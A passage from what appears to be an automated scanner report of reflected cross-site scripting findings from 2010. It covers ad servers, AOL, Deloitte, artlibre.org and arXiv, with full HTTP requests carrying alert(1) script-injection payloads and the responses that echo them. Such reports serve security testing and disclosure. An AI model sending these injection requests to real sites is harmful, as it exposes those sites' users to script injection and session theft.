8011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66Bc586e"-alert(1)-"b8e9766edfd&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/process-transforma
...[SNIP]...

1.76. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11626"-alert(1)-"1111d615a75 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=46733511626"-alert(1)-"1111d615a75&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:57 GMT
Expires: Mon, 22 Nov 2010 00:08:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7028

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/d%3B231155693%3B3-0%3B0%3B54795159%3B4307-300/250%3B38011073/38028830/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=46733511626"-alert(1)-"1111d615a75&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=
...[SNIP]...

1.77. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d853"-alert(1)-"06c62bbdd38 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=29d853"-alert(1)-"06c62bbdd38&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:34 GMT
Expires: Mon, 22 Nov 2010 00:10:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
%3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=29d853"-alert(1)-"06c62bbdd38&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.
...[SNIP]...

1.78. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c49e5"-alert(1)-"8a7d815ab33 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041c49e5"-alert(1)-"8a7d815ab33&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:32 GMT
Expires: Mon, 22 Nov 2010 00:08:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...

var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/u%3B231155693%3B7-0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041c49e5"-alert(1)-"8a7d815ab33&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.
...[SNIP]...

1.79. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1d05"-alert(1)-"b12f47b9ddd was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46d1d05"-alert(1)-"b12f47b9ddd&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:31 GMT
Expires: Mon, 22 Nov 2010 00:16:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
t=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46d1d05"-alert(1)-"b12f47b9ddd&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai");
var fscUrl = url;
var fscUrlClickTagF
...[SNIP]...

1.80. http://advertising.aol.com/brands/tuaw [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/tuaw

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94be2'><script>alert(1)</script>9f219222b62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/tuaw94be2'><script>alert(1)</script>9f219222b62 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:18:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=514944d6482739b248886c388971410b; expires=Wed, 15 Dec 2010 04:52:19 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:18:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/tuaw94be2'><script>alert(1)</script>9f219222b62.png' alt='tuaw94be2'>
...[SNIP]...

1.81. http://advertising.aol.com/brands/tuaw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/tuaw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1d2a'><script>alert(1)</script>baf21def41f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/tuaw?f1d2a'><script>alert(1)</script>baf21def41f=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:18:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8359ee48556954edb316d76322eb445d; expires=Wed, 15 Dec 2010 04:52:04 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:18:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/tuaw&f1d2a'><script>alert(1)</script>baf21def41f=1.png' alt='tuaw&f1d2a'>
...[SNIP]...

1.82. http://alumni.deloitte.cz/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alumni.deloitte.cz
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e49cf"><script>alert(1)</script>5c886eb515 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e49cf"><script>alert(1)</script>5c886eb515=1 HTTP/1.1
Host: alumni.deloitte.cz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:18:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.3
Set-Cookie: PHPSESSID=75ac4f96d3bf692d5fb8c42a7e63c71e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
...[SNIP]...
<form name="frmLogin" id="frmLogin" action="/?e49cf"><script>alert(1)</script>5c886eb515=1" method="post">
...[SNIP]...

1.83. http://artlibre.org/licence/lalgb.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://artlibre.org
Path:   /licence/lalgb.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df786<script>alert(1)</script>1f52ce30d3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /licencedf786<script>alert(1)</script>1f52ce30d3f/lalgb.html HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:33:12 GMT
Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:33:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/x
...[SNIP]...
<a href="#">http://artlibre.org/licencedf786<script>alert(1)</script>1f52ce30d3f/lalgb.html</a>
...[SNIP]...

1.84. http://artlibre.org/licence/lalgb.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://artlibre.org
Path:   /licence/lalgb.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9faec<script>alert(1)</script>e8dae2f14a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /licence/9faec<script>alert(1)</script>e8dae2f14a5 HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:33:16 GMT
Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:33:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/x
...[SNIP]...
<a href="#">http://artlibre.org/licence/9faec<script>alert(1)</script>e8dae2f14a5</a>
...[SNIP]...

1.85. http://arxiv.org/abs/1003.0449 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv.org
Path:   /abs/1003.0449

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1786e</title><script>alert(1)</script>164767422c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1003.04491786e</title><script>alert(1)</script>164767422c2 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565968129; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1824

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<title>[1003.04491786e</title><script>alert(1)</script>164767422c2] Bad paper identifier</title>
...[SNIP]...

1.86. http://arxiv.org/abs/1003.0449 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv.org
Path:   /abs/1003.0449

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19375<script>alert(1)</script>1132cb8b8bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1003.044919375<script>alert(1)</script>1132cb8b8bf HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565166801; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1800

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<h1>Paper identifier '1003.044919375<script>alert(1)</script>1132cb8b8bf' not recognized</h2>
...[SNIP]...

1.87. http://arxiv4.library.cornell.edu/abs/1011.3707 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv4.library.cornell.edu
Path:   /abs/1011.3707

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3a16c</title><script>alert(1)</script>c9c8fd9cb5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e HTTP/1.1
Host: arxiv4.library.cornell.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:47 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389567349336; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1824

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<title>[1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e] Bad paper identifier</title>
...[SNIP]...

1.88. http://arxiv4.library.cornell.edu/abs/1011.3707 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv4.library.cornell.edu
Path:   /abs/1011.3707

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e1c1<script>alert(1)</script>0f8702ef860 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1011.37074e1c1<script>alert(1)</script>0f8702ef860 HTTP/1.1
Host: arxiv4.library.cornell.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565501583; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1800

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<h1>Paper identifier '1011.37074e1c1<script>alert(1)</script>0f8702ef860' not recognized</h2>
...[SNIP]...

1.89. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13199"><script>alert(1)</script>c1eaaf68b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe13199"><script>alert(1)</script>c1eaaf68b6c/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn13199"><script>alert(1)</script>c1eaaf68b6c/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.90. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d3d"><script>alert(1)</script>c653d13393c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0b7d3d"><script>alert(1)</script>c653d13393c/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
